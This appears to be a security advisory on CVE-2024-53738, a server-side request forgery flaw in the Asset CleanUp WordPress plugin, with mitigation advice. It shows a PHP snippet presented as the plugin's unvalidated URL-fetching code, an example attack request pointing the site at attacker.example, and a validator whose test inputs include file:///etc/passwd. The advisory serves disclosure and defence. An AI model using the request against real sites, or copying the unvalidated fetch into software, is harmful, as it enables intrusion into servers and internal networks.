A recently discovered vulnerability, identified as CVE-2024-53738, has been found in the Gabe Livan Asset CleanUp: Page Speed Booster plugin. This vulnerability presents a Server-Side Request Forgery (SSRF) risk that affects plugin versions through 1.3.9.8. In this post, we'll discuss the details of the vulnerability and provide information on how to address this issue.

I. Vulnerability Overview

Server-Side Request Forgery (SSRF) is a web application security vulnerability that allows an attacker to make a vulnerable server issue arbitrary requests, typically targeting internal systems, on the attacker's behalf. In the case of the Gabe Livan Asset CleanUp: Page Speed Booster plugin, the SSRF vulnerability exists because the plugin does not properly validate and sanitize user input, thereby enabling attackers to execute unauthorized actions.

- Affected Plugin: Gabe Livan Asset CleanUp: Page Speed Booster
- Affected Versions: n/a through 1.3.9.8

II. Code Snippet

The vulnerability is present in specific parts of the plugin's code that do not properly sanitize and validate user input. Below is a snippet of the vulnerable code:

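function assetcleanup_get_content(){
    if(isset($_GET['assetcleanup_get'])) {
        // Attacker-controlled value: decoded but never validated
        $url = base64_decode($_GET['assetcleanup_get']);
        // Fetches whatever URL was supplied, with no scheme or host restriction
        $content = file_get_contents($url);
        // Returns the fetched response body to the requester
        echo $content;
    }
}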

As shown in the code snippet, the plugin processes the $_GET['assetcleanup_get'] parameter without proper input validation and sanitization. It decodes the parameter using base64_decode and fetches the content of the given URL using file_get_contents. This allows an attacker to craft a malicious request that could lead to SSRF.

III. Exploit Details

An attacker could exploit the SSRF vulnerability in Gabe Livan Asset CleanUp: Page Speed Booster by sending a specially crafted request with an encoded URL. The request would force the plugin to fetch content from an attacker-controlled server, which could potentially give the attacker unauthorized access to sensitive data or internal systems, or even let them perform actions on behalf of the vulnerable server.

Example of a malicious request:

http://victim.example/wp-admin/admin-ajax.php?action=assetcleanup_get_content&assetcleanup_get=[base64_encoded_evil_url]

By replacing [base64_encoded_evil_url] with the base64 encoding of a malicious URL (e.g., http://attacker.example/malicious_script.php), the attacker could effectively force a vulnerable server to execute requests on their behalf.

IV. Mitigation and Remediation

The vulnerability has been fixed in version 1.3.9.9 of the Gabe Livan Asset CleanUp: Page Speed Booster plugin. It is strongly recommended that users of affected plugin versions update to 1.3.9.9 or later as soon as possible.

To further protect your website from SSRF attacks and other vulnerabilities, consider the following best practices:
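
One such practice is validating a URL before the server fetches it. The PHP below is an added example, not code from the plugin or from its 1.3.9.9 fix; the function name, the allowlisted hosts and the injectable IPv4 resolver are assumptions, and the sample URLs and addresses are constructed.

```php
<?php
// Added example, not the plugin's code; all names here are hypothetical.
// Returns the decoded URL if it is safe to fetch, else null. $resolver maps a host to IPv4 strings or false.
function example_validate_fetch_url(string $encoded, array $allowedHosts, ?callable $resolver = null): ?string
{
    $resolver = $resolver ?? 'gethostbynamel';
    // Strict mode rejects characters outside the base64 alphabet.
    $url = base64_decode($encoded, true);
    if ($url === false) {
        return null;
    }
    $parts = parse_url($url);
    if (!is_array($parts) || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // http(s) only: rules out file://, php:// and other stream wrappers.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // Reject embedded credentials (user:pass@host), which can confuse URL parsers.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;
    }
    // Exact-match allowlist of hosts the feature legitimately needs.
    $host = strtolower($parts['host']);
    if (!in_array($host, $allowedHosts, true)) {
        return null;
    }
    // Every resolved address must be public: no private, loopback or link-local.
    $ips = $resolver($host);
    if (!is_array($ips) || $ips === []) {
        return null;
    }
    $flags = FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    foreach ($ips as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return null;
        }
    }
    return $url;
}
// Constructed sample data: allowlist, a stub resolver and test URLs.
$allowed = ['cdn.example.com', 'intranet.example.com'];
$dns = ['cdn.example.com' => ['93.184.216.34'], 'intranet.example.com' => ['10.0.0.5']];
$stub = fn(string $h) => $dns[$h] ?? false;
foreach (['https://cdn.example.com/a.css', 'file:///etc/passwd', 'https://intranet.example.com/x'] as $u) {
    $ok = example_validate_fetch_url(base64_encode($u), $allowed, $stub) !== null;
    echo $u, ' => ', $ok ? 'allowed' : 'rejected', PHP_EOL;
}
```

When fetching the returned URL, disable redirect following, since a redirect can point back at an internal address. Inside WordPress, wp_safe_remote_get() applies comparable URL checks before making the request.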

V. References

- CVE-2024-53738 (CVE Entry): https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53738
- Gabe Livan Asset CleanUp: Page Speed Booster plugin: https://wordpress.org/plugins/wp-asset-clean-up/
- SSRF (OWASP): https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
- Mitigation steps for SSRF vulnerabilities (OWASP): https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

Conclusion

We've provided a detailed explanation of the SSRF vulnerability found in the Gabe Livan Asset CleanUp: Page Speed Booster plugin (CVE-2024-53738). To mitigate this vulnerability, users should update to the latest version (1.3.9.9) and follow best practices to secure their websites. Always stay up-to-date on security announcements and keep your plugins, themes, and core software updated to mitigate these types of risks.

Timeline

Published on: 11/30/2024 21:15:15 UTC